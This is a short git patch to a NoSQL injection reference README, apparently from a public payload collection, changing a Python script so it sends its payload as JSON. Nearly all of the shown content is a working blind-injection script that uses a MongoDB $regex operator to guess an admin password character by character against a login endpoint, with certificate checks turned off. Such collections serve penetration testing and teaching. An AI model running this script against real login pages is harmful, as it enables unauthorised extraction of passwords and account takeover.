From 0ccccd0feadee2ba371fee584093f09e3ffa98a2 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 24 Apr 2019 22:59:24 +0200
Subject: [PATCH] add JSON headers

---
 NoSQL Injection/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 1548bd4..130f735 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -63,12 +63,13 @@ urllib3.disable_warnings()
 username="admin"
 password=""
 u="http://example.org/login"
+headers={'content-type': 'application/json'}
 
 while True:
     for c in string.printable:
         if c not in ['*','+','.','?','|']:
             payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
-            r = requests.post(u, data = {'ids': payload}, verify = False)
+            r = requests.post(u, data = payload, headers = headers, verify = False)
             if 'OK' in r.text:
                 print("Found one more char : %s" % (password+c))
                 password += c